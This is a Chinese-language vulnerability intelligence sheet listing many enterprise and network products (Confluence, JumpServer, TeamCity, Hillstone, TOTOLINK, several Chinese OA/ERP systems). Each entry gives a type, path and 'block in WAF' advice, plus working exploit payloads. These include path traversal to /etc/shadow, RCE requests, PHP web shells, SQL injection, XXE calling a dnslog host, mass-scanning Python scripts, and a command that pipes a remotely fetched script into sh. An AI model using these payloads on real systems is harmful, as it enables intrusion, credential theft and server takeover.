| Check Point Security Gateways R81.10.x |
|
|
|
|
|
| Check Point Security Gateways R81.20 |
/clients/MyCRL |
WAF封禁路路径,等待发布补丁 |
725 |
nday |
|
漏洞详情
POST /clients/MyCRL HTTP/1.1
aCSHELL/../../../../../../../etc/shadow
Atlassian
Confluence远程命令执行漏洞(CVE-2024-21683)
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
Confluence Data Center = 8.9.0 |
|
|
|
|
| 8.8.0 <= Confluence Data Center <= 8.8.1 |
|
|
|
|
|
| 8.7.1 <= Confluence Data Center <= 8.7.2 |
|
|
|
|
|
| 8.6.0 <= Confluence Data Center <= 8.6.2 |
|
|
|
|
|
| 8.5.0 <= Confluence Data Center and Server <= 8.5.8 (LTS) |
|
|
|
|
|
| 8.4.0 <= Confluence Data Center and Server <= 8.4.5 |
|
|
|
|
|
| 8.3.0 <= Confluence Data Center and Server <= 8.3.4 |
|
|
|
|
|
| 8.2.0 <= Confluence Data Center and Server <= 8.2.4 |
|
|
|
|
|
| 8.1.0 <= Confluence Data Center and Server <= 8.1.4 |
|
|
|
|
|
| 8.0.0 <= Confluence Data Center and Server <= 8.0.4 |
|
|
|
|
|
| 7.20.0 <= Confluence Data Center and Server <= 7.20.3 |
|
|
|
|
|
| 7.19.0 <= Confluence Data Center and Server <= 7.19.21 (LTS) |
|
|
|
|
|
| 7.18.0 <= Confluence Data Center and Server <= 7.18.3 |
|
|
|
|
|
| 7.17.0 <= Confluence Data Center and Server <= 7.17.5 |
/admin/plugins/newcode/addlanguage.action |
WAF封禁路路径,等待发布补丁 |
725 |
nday |
|
漏洞详情
POST /admin/plugins/newcode/addlanguage.action HTTP/1.1
--f6dae662e22371daece5ff851b1c4a39
test
--f6dae662e22371daece5ff851b1c4a39
new java.lang.ProcessBuilder["(java.lang.String[])"](["ping 5hnlyo.dnslog.cn"]).start()
--f6dae662e22371daece5ff851b1c4a39--
D-LINK
D-LINK-DIR-845L接口bsc_sms_inbox.php存在信息泄露漏洞(CVE-2024-33113)
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 信息泄露 |
未知 |
/getcfg.php?a=%0A_POST_SERVICES=DEVICE.ACCOUNT%0AAUTHORIZED_GROUP=1 |
WAF封禁路路径,等待发布补丁 |
725 |
nday |
漏洞详情
/getcfg.php?a=%0A_POST_SERVICES=DEVICE.ACCOUNT%0AAUTHORIZED_GROUP=1
?企互联
?企互联loginService任意登录
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 未授权访问 |
未知 |
/loginService.fe?op=D |
WAF封禁路路径,等待发布补丁 |
725 |
nday |
漏洞详情
/loginService.fe?op=D
安恒
安恒明御安全网关远程命令执行漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 未知 |
未知 |
/webui/ |
WAF封禁路路径,等待发布补丁 |
725 |
nday |
漏洞详情
GET /webui/?g=aaa_portal_auth_config_reset&type=echo '<?php echo "assdwdmpidmsbzoabahpjhnokiduw"; phpinfo(); ?>' >> /usr/local/webui/txzfsrur.php
安恒明御安全网关rce
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/webui/?g=aaa_portal_auth_local_submit |
WAF封禁路路径,等待发布补丁 |
726 |
nday |
漏洞详情
GET /webui/?g=aaa_portal_auth_local_submit&bkg_flag=0&$type=1&suffix=1|echo+" <%3fphpteval(\$_POST[\"a\"]) ;?>"+>+.xxx.php HTTP/1.1
安恒-下一代防火墙-RCE
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/webui/?g=aaa_portal_auth_local_submit&bkg_flag=0&suffix= |
WAF封禁路路径,等待发布补丁 |
726 |
nday |
漏洞详情
GET /webui/?g=aaa_portal_auth_local_submit&bkg_flag=0&suffix=%60id+%3E/usr/local/webui/frrgkquigh.txt%60 HTTP/1.1
jumpserver
JumpServer(CVE-2024-29202)Jinin2模板注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
v3.0.0 <= JumpServer <= v3.10.6 |
/ |
WAF封禁路路径,等待发布补丁 |
725 |
nday |
漏洞详情
[{
"name": "RCE playbook",
"hosts": "all",
"tasks": [
{
"name": "this runs in Celery container",
"shell": "id > /tmp/pwnd",
"\u0064elegate_to": "localhost"
} ],
"vars": {
"ansible_\u0063onnection": "local"
}
}]
JumpServer(CVE-2024-29201)远程代码执行漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
v3.0.0 <= JumpServer <= v3.10.6 |
/ |
WAF封禁路路径,等待发布补丁 |
725 |
nday |
漏洞详情
- name: |
{% for x in ().__class__.__base__.__subclasses__() %}
{% if "warning" in x.__name__ %}
{{
x()._module.__builtins__["__import__"]("os").system("id > /tmp/pwnd2")
}}
{%endif%}
{%endfor%}
宏景
宏景eHR-HCM-DisplayExcelCustomReport接口存在任意文件读取漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 任意文件读取 |
未知 |
/templates/attestation/../../servlet/DisplayExcelCustomReport |
WAF封禁路路径,等待发布补丁 |
726 |
nday |
漏洞详情
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
filename=../webapps/ROOT/WEB-INF/web.xml
宏景eHR系统ajaxService接口处存在SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/ajax/ajaxService |
WAF封禁路路径,等待发布补丁 |
808 |
nday |
漏洞详情
POST /ajax/ajaxService HTTP/1.1
__type=extTrans&__xml={"functionId":"151211001137","sql":"select~20sys.fn_sqlvarbasetostr(HASHBYTES('MD5','1'))~20a~30~31~30~30~2c~31~20a~30~31~30~31~2c~31~20b~30~31~31~30~2c~31~20e~30~31~32~32~2c~31~20e~30~31a~31~2c~31~20dbase~2c~31~20a~30~30~30~30~20from~20operuser","nbase":"1"}
汇智
汇智ERP-filehandle.aspx存在任意文件读取漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 任意文件读取 |
未知 |
/nssys/common/filehandle.aspx |
WAF封禁路路径,等待发布补丁 |
726 |
nday |
漏洞详情
GET /nssys/common/filehandle.aspx?filepath=C%3a%2fwindows%2fwin%2eini HTTP/1.1
西软云
西软云XMS-futurehotel/operate接口存在XXE漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| XXE |
未知 |
/XopServerRS/rest/futurehotel/operate |
WAF封禁路路径,等待发布补丁 |
726 |
nday |
漏洞详情
POST /XopServerRS/rest/futurehotel/operate HTTP/1.1
<!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://xxx.dnslog.cn"> %remote;]>
云时空
云时空商业ERP文件上传
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/uploads/pics/2023-12-6/test.jsp |
WAF封禁路路径,等待发布补丁 |
726 |
nday |
漏洞详情
import requests
def verify(ip):
url = f'{ip}/uploads/pics/2023-12-6/test.jsp'
headers = {
'Content-Type': 'multipart/form-data; boundary=4eea98d02AEa93f60ea08dE3C18A1388',
}
payload = '''
--4eea98d02AEa93f60ea08dE3C18A1388
Content-Disposition: form-data; name="file1"; filename="test.jsp"
Content-Type: application/octet-stream
<% out.println("This website has a vulnerability"); %>
--4eea98d02AEa93f60ea08dE3C18A1388--
'''
try:
response = requests.post(url, headers=headers, data=payload)
if response.status_code == 200 :
print(f"{ip}存在云时空商业ERP文件上传!!!")
else:
print('漏洞不存在。')
except Exception as e:
pass
if __name__ == '__main__':
self = input('请输入目标主机IP地址:')
verify(self)
云时空社会化商业ERP系统online存在身份认证绕过漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 未授权访问 |
未知 |
/sys/user/online |
WAF封禁路路径,等待发布补丁 |
808 |
nday |
漏洞详情
GET /sys/user/online HTTP/1.1
易宝
易宝OA ExecuteSqlForSingle SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/api/system/ExecuteSqlForSingle |
WAF封禁路路径,等待发布补丁 |
726 |
nday |
漏洞详情
import requests
import concurrent.futures
def check_vulnerability(target):
headers = {
"User-Agent": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)",
"Content-Type": "application/x-www-form-urlencoded"
}
data = {
"token": "zxh",
"sql": "select substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)",
"strParameters": ""
}
try:
res = requests.post(f"{target}/api/system/ExecuteSqlForSingle", headers=headers,data=data,timeout=5)
if "e10adc3949ba59abbe56e057f20f883e" in res.text and "success" in res.text:
print(f"{target} 漏洞存在")
with open("attack.txt", 'a') as f:
f.write(f"{target}\n")
else:
print(f"{target} 漏洞不存在")
except:
print(f"{target} 访问错误")
if __name__ == "__main__":
f = open("target.txt", 'r')
targets = f.read().splitlines()
with concurrent.futures.ThreadPoolExecutor(max_workers=20) as executor:
executor.map(check_vulnerability, targets)
易宝OA系统BasicService.asmx SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/WebService/BasicService.asmx |
WAF封禁路路径,等待发布补丁 |
809 |
0day |
漏洞详情
POST /WebService/BasicService.asmx HTTP/1.1
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetStreamID xmlns="http://tempuri.org/">
<tableName>';waitfor delay '0:0:6'--+</tableName>
<webservicePassword>{ac80457b-368d-4062-b2dd-ae4d490e1c4b}</webservicePassword>
</GetStreamID>
</soap:Body>
</soap:Envelope>
好视通
好视通视频会议系统存在任意文件读取漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 任意文件读取 |
未知 |
/register/toDownload.do |
WAF封禁路路径,等待发布补丁 |
726 |
nday |
漏洞详情
import requests
import concurrent.futures
def check_vulnerability(target):
headers = {
"User-Agent": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)",
"Content-Length":"0"
}
try:
res = requests.get(f"{target}/register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini", headers=headers, timeout=5,verify=False)
if "extensions"in res.text and "CMCDLLNAME32" in res.text:
print(f"[+]{target}漏洞存在")
with open("attack.txt",'a') as fw:
fw.write(f"{target}\n")
else:
print(f"[-]{target}漏洞不存在")
except Exception as e:
print(f"[-]{target}访问错误")
if __name__ == "__main__":
print("target.txt存放目标文件")
print("attack.txt存放检测结果")
print("按回车继续")
import os
os.system("pause")
f = open("target.txt", 'r')
targets = f.read().splitlines()
print(targets)
with concurrent.futures.ThreadPoolExecutor(max_workers=1) as executor:
executor.map(check_vulnerability, targets)
JeePlus
JeePlus快速开发平台resetpassword存在SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/kjds2022/a/sys/user/resetPassword?mobile= |
WAF封禁路路径,等待发布补丁 |
726 |
nday |
漏洞详情
/kjds2022/a/sys/user/resetPassword?mobile=18888888888%27and%20(updatexml(1,concat(0x7e,(select%20md5(123456)),0x7e),1))%23
Jetbrains
Jetbrains_Teamcity_远程代码执行漏洞_CVE_2023_42793
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/app/rest/debug/processes |
WAF封禁路路径,等待发布补丁 |
726 |
nday |
漏洞详情
DELETE /app/rest/users/id:1/tokens/RPC2 HTTP/1.1
POST /app/rest/users/id:1/tokens/RPC2 HTTP/1.1
POST /admin/dataDir.html?action=edit&fileName=config%2Finternal.properties&content=rest.debug.processes.enable=true HTTP/1.1
POST /admin/dataDir.html?action=edit&fileName=config%2Finternal.properties&content=rest.debug.processes.enable=true HTTP/1.1
POST /app/rest/debug/processes?exePath=id&parms=-a HTTP/1.1
eyJ0eXAiOiAiVENWMiJ9.MjFfTWxGODVqLXdTMmNfRjRldk9pMXNQSk1B.MTg1YTZlYzQtMDJlZi00NzljLWFhOWYtMmJiODYzYTYzODNj
捷诚
捷诚管理信息系统 SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx |
WAF封禁路路径,等待发布补丁 |
726 |
nday |
漏洞详情
import time
import requests
def verify(ip):
url = f'{ip}EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx'
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',
'Connection': 'close',
'Content-Length': '369',
'Accept': '*/*',
'Accept-Language': 'en',
'Content-Type': 'text/xml; charset=utf-8',
'Accept-Encoding': 'gzip',
}
payload = '''<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetOSpById xmlns="http://tempuri.org/">
<sId>1';waitfor delay '0:0:5'--+</sId>
</GetOSpById>
</soap:Body>
</soap:Envelope>'''
try:
start_time = time.time()
response = requests.post(url, headers=headers, data=payload,verify=False)
end_time = time.time()
res_time = end_time - start_time
if response.status_code == 200 and res_time > 5 and res_time < 8:
print(f"{ip}存在捷诚管理信息系统SQL注入漏洞!!!")
except Exception as e:
pass
if __name__ == '__main__':
self = input('请输入目标主机IP地址:')
verify(self)
禅道
禅道研发项?管理系统未授权
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 未授权访问 |
未知 |
/misc-captcha-user.html |
WAF封禁路路径,等待发布补丁 |
726 |
nday |
漏洞详情
import requests
def check(url):
url1 = url+'/misc-captcha-user.html'
url3 = url + 'repo-create.html'
url4 = url + 'repo-edit-10000-10000.html'
headers={
"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36",
"Accept-Language":"zh-CN,zh;q=0.9",
"Cookie":"zentaosid=u6vl6rc62jiqof4g5jtle6pft2; lang=zh-cn; device=desktop; theme=default",
}
headers2 = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36",
"Accept-Language": "zh-CN,zh;q=0.9",
"Cookie": "zentaosid=u6vl6rc62jiqof4g5jtle6pft2; lang=zh-cn; device=desktop; theme=default",
"Content-Type":"application/x-www-form-urlencoded",
"X-Requested-With":"XMLHttpRequest",
"Referer":url+"/repo-edit-1-0.html"
}
data1 = 'product%5B%5D=1&SCM=Gitlab&name=66666&path=&encoding=utf-8&client=&account=&password=&encrypt=base64&desc=&uid='
data2 = 'SCM=Subversion&client=`id`'
s=requests.session()
try:
req1 = s.get(url1,proxies=proxies,timeout=5,verify=False,headers=headers)
req3 = s.post(url3,data=data1,proxies=proxies,timeout=5,verify=False,headers=headers2)
req4 = s.post(url4,data=data2,proxies=proxies,timeout=5,verify=False,headers=headers2)
if 'uid=' in req4.text:
print(url,"")
return True
except Exception as e:
print(e)
return False
if __name__ == '__main__':
print(check("http://x.x.x.x/zentao/"))
科荣
科荣 AIO 管理系统任意文件读取
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 任意文件读取 |
未知 |
/UtilServlet |
WAF封禁路路径,等待发布补丁 |
726 |
nday |
漏洞详情
import base64
import requests
def poc(ip, file_path):
url = f'http://{ip}/UtilServlet'
headers = {
'Upgrade - Insecure - Requests': '1',
'sec - ch - ua - mobile': '?0',
'Cache - Control': 'no - cache',
'Pragma': 'no - cache',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
'Accept - Encoding': 'gzip, deflate',
'Content - Type': 'application / x - www - form - urlencoded',
'sec - ch - ua': '"Google Chrome";v="118", "Chromium";v="118", "Not=A?Brand";v="24"',
'sec - ch - ua - platform': '"Windows"',
'Accept - Language': 'zh-CN,zh;q=0.9',
'User - Agent': 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36',
'Content - Length': '0'
}
data = {
f'operation=readErrorExcel&fileName={file_path}'
}
print(url,data)
try:
response = requests.get(url=url, headers=headers, data=data)
byte_data = response.encode(encoding='utf-8')
response = base64.b64encode(byte_data)
print(response)
if response.status_code == 200 :
print(f' {ip} 存在科荣 AIO 管理系统任意文件读取漏洞!!!')
print(response.text)
except Exception as e:
print(f'{ip} 请求失败:{e}')
pass
if __name__ == '__main__':
ip = input('请输入目标主机IP地址:')
file_path = input('请输入需要访问的文件路径:')
poc(ip, file_path)
科荣 AIO 管理系统 UtilServlet 远程代码执行漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/UtilServlet |
WAF封禁路路径,等待发布补丁 |
808 |
1day |
漏洞详情
POST /UtilServlet HTTP/1.1
Host:
operation=calculate&value=BufferedReader+br+%3d+new+BufferedReader(new+InputStreamReader(Runtime.getRuntime().exec("cmd.exe+/c+ipconfig").getI
nputStream()))%3bString+line%3bStringBuilder+b+%3d+new+StringBuilder()%3bwhile+((line+%3d+br.readLine())+!%3d+null)+{b.append(line)%3b}return+new+String(b)%3b&fieldName=example_field
科荣AIO管理系统endTime参数存在SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/moffice |
WAF封禁路路径,等待发布补丁 |
0819 |
nday |
利用路径
GET /moffice?op=showWorkPlanList&type=1&beginTime=1&endTime=1*&sid=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
F-logic
F-logic DataCube3存在命令执行漏洞(CVE-2024-7066)
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/admin/config_time_sync.php |
WAF封禁路路径,等待发布补丁 |
726 |
nday |
漏洞详情
POST /admin/config_time_sync.php HTTP/1.1
accesstime=0.66992700 1710752870&execute=&ntp_enable=&ntp_server=127.0.0.1|id >aaa.txt|&ntp_retry_count=1
todesk
todesk config.ini算法缺陷可被猜解导致rce
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
v4.7.4.2 |
未知 |
等着 |
726 |
0day |
漏洞详情
未知
山石网科
山石网科云鉴存在前台任意命令执行漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/master/ajaxActions/setSystemTimeAction.php |
WAF封禁路路径,等待发布补丁 |
726 |
nday |
漏洞详情
import requests
'''
HSVD-2023-0008
'''
def setSystemTimeAction(newcsrf,headers):
url = "https://192.168.199.221/master/ajaxActions/setSystemTimeAction.php?token_csrf="+newcsrf
proxies = {'https':'http://127.0.0.1:8080'}
x = "param=os.system('id > /opt/var/majorsec/installation/master/runtime/img/config')"
req2 = requests.post(url, data=x,headers=headers, verify=False)
'''
HSVD-2023-0005
'''
def getMessageSettingAction(newcsrf,header):
proxies = {'https':'http://127.0.0.1:8080'}
company_uuid = "aaa"
platform_sel = "os.system('id > /opt/var/majorsec/installation/master/runtime/img/config')"
url = 'https://192.168.199.221/master/ajaxActions/getMessageSettingAction.php?token_csrf='+newcsrf+"&company_uuid="+company_uuid+"&platform_sel="+platform_sel
req = requests.get(url, headers=header, verify=False)
print(req.text)
def main():
headers = {"Cookie": "PHPSESSID=emhpeXVhbg;",
"Content-Type":"application/x-www-form-urlencoded; charset=UTF-8"
}
url = "https://192.168.199.221/master/ajaxActions/getTokenAction.php"
req = requests.post(url, verify=False, headers=headers)
newcsrf = req.text.replace("\n", "")
setSystemTimeAction(newcsrf,headers)
reshell = requests.get('https://192.168.199.221/master/img/config',verify=False)
print('---------------------cmd-------------------------')
print(reshell.text)
if __name__ == '__main__':
main()
山石网科堡垒机存在远程代码执行漏洞0day(实际为去年老洞)
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/rest/v1/trusted_hosts |
升级系统版本 |
726 |
nday |
漏洞详情
山石运维安全网关是集运维管理与运维审计为一体的堡垒机设备,实现对核心资产的统一认证、统一授权、统一审计,全方位提升运维风险控制能力。由于该软件的 Web 应用对用户的输入未进行有效过滤,直接拼接系统命令执行,造成了远程代码执行漏洞。攻击者可通过构造恶意请求,拼接命令执行任意代码,控制服务器。
山石网科 WAF 远程代码执行漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
前年老洞,自己搜 |
WAF封禁路路径,等待发布补丁 |
0823 |
nday |
漏洞详情
import requests,sys
requests.packages.urllib3.disable_warnings()
session = requests.Session()
target = "https://192.168.247.196/".strip("/")
cmd="curl\x24{IFS}192.168.247.1:9999/cccc|sh"
url = target+"/rest/captcha"
headers = {"Accept":"*/*","User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)","Accept-Language":"en;q=0.9"}
sss=requests.get(url,headers=headers,verify=False)
if "PNG" not in sss.content:
print("target not vuln")
sys.exit()
cookies = {"PHPSESSID":"aaaaaaaaaa%3b"+cmd+"%3bd"}
try:
response = session.get(target+"/rest/captcha", headers=headers, cookies=cookies,verify=False,timeout=5)
except requests.exceptions.ReadTimeout:
print("payload work")
sys.exit()
print("payload send!")
易宝 OA /api/system/ExecuteQueryNoneResult 接口SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/api/system/ExecuteQueryNoneResult |
WAF封禁路路径,等待发布补丁 |
0828 |
0day |
漏洞详情
POST /api/system/ExecuteQueryNoneResult HTTP/1.1
Host:
token=zxh&cmdText=;WAITFOR+DELAY+'0:0:10'
百易云
百易云-资产管理运营系统-任意文件上传
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/comfileup.php |
WAF封禁路路径,等待发布补丁 |
726 |
nday |
漏洞详情
POST /comfileup.php HTTP/1.1
----------1110146050
<?php system("whoami");unlink(__FILE__);?>
----------1110146050--
广州图创
广州图创-图书馆集群管理系统-PermissionAC
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 未授权访问 |
未知 |
/interlibSSO/api/BrowseLogInterface?cmdACT=doDataFlowLogStatistic4ERM&sysid=1 |
WAF封禁路路径,等待发布补丁 |
726 |
nday |
漏洞详情
/interlibSSO/api/BrowseLogInterface?cmdACT=doDataFlowLogStatistic4ERM&sysid=1
华天动力
华天动力-OA-downloadWpsFile任意文件读取
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 任意文件读取 |
未知 |
/OAapp/jsp/downloadWpsFile.jsp |
WAF封禁路路径,等待发布补丁 |
726 |
nday |
漏洞详情
GET /OAapp/jsp/downloadWpsFile.jsp?fileName=../../../../../../htoa/Tomcat/webapps/ROOT/WEB-INF/web.xml HTTP/1.1
金慧
金慧-综合管理信息系统-SQL注入
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/Portal/LoginBegin.aspx?ReturnUrl= |
WAF封禁路路径,等待发布补丁 |
726 |
nday |
漏洞详情
POST /Portal/LoginBegin.aspx?ReturnUrl=%2f HTTP/1.1
Todo=Validate&LoginName=1%27+AND+5094+IN+%28SELECT+%28CHAR%28113%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28120%29%2BCHAR%28113%29%2B%28SELECT+%28CASE+WHEN+%285094%3D5094%29+THEN+CHAR%2849%29+ELSE+CHAR%2848%29+END%29%29%2BCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28118%29%2BCHAR%28120%29%2BCHAR%28113%29%29%29+AND+%27JKJg%27%3D%27JKJg&Password=&CDomain=Local&FromUrl=
九思
九思-OA-任意文件上传
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/jsoa/wpsforlinux/src/upload_l.jsp?openType= |
WAF封禁路路径,等待发布补丁 |
726 |
nday |
漏洞详情
/jsoa/wpsforlinux/src/upload_l.jsp?openType=
金蝶
金蝶-云星空-SQL注入
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/K3Cloud/Kingdee.BOS.ServiceFacade.ServicesStub.Account.AccountService.GetDataCenterList.common.kdsvc |
WAF封禁路路径,等待发布补丁 |
726 |
nday |
漏洞详情
/K3Cloud/Kingdee.BOS.ServiceFacade.ServicesStub.Account.AccountService.GetDataCenterList.common.kdsvc
金蝶云星空ScpSupRegHandler任意文件上传漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/k3cloud/SRM/ScpSupRegHandler |
WAF封禁路路径,等待发布补丁 |
812 |
nday |
漏洞详情
POST /k3cloud/SRM/ScpSupRegHandler HTTP/1.1
--test
.
--test
2022
--test
<% Response.Write("test") %>
--test--
TOTOLINK
T18-1TOTOLINK-A6000R-RCE
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
A6000R |
/cgi-bin/luci/admin/mtk/webcmd |
WAF封禁路路径,等待发布补丁 |
726 |
nday |
漏洞详情
GET /cgi-bin/luci/admin/mtk/webcmd?cmd=ls%20/>/www/555.txt HTTP/1.1
TOTOLINK-A3700R未授权访问漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 未授权访问 |
未知 |
/wizard.html |
WAF封禁路路径,等待发布补丁 |
807 |
nday |
漏洞详情
http://ip/wizard.html
http://ip/phone/wizard.html
TOTOLINK多个版本存在泄漏账号密码
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 信息泄露 |
未知 |
/cgi-bin/ExportSettings.sh |
WAF封禁路路径,等待发布补丁 |
807 |
nday |
漏洞详情
/cgi-bin/ExportSettings.sh
拓尔思
拓尔思-TRSWAS5.0-PermissionAC文件上传
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
5 |
/mas/servlets/uploadThumb?appKey=sv&uploading=1 |
WAF封禁路路径,等待发布补丁 |
726 |
nday |
漏洞详情
/mas/servlets/uploadThumb?appKey=sv&uploading=1
拓尔思TRS媒资管理系统uploadThumb存在文件上传漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/mas/servlets/uploadThumb |
WAF封禁路路径,等待发布补丁 |
731 |
1day |
漏洞详情
POST /mas/servlets/uploadThumb?appKey=sv&uploadingId=asd HTTP/1.1
------WebKitFormBoundarySl8siBbmVicABvTX
filename="%2e%2e%2fwebapps%2fmas%2fa%2etxt"
1234
------WebKitFormBoundarySl8siBbmVicABvTX--
紫光
紫光-电子档案管理系统-PermissionAC
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/Archive/ErecordOffice/openOfficeFile |
WAF封禁路路径,等待发布补丁 |
726 |
nday |
漏洞详情
/Archive/ErecordOffice/openOfficeFile
科讯
科迅-一卡通管理系统-SQL注入
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/api/dormitoryHealthRanking |
WAF封禁路路径,等待发布补丁 |
726 |
nday |
漏洞详情
GET /api/dormitoryHealthRanking?building=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27-- HTTP/1.1
科迅-一卡通管理系统-SQL注入
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
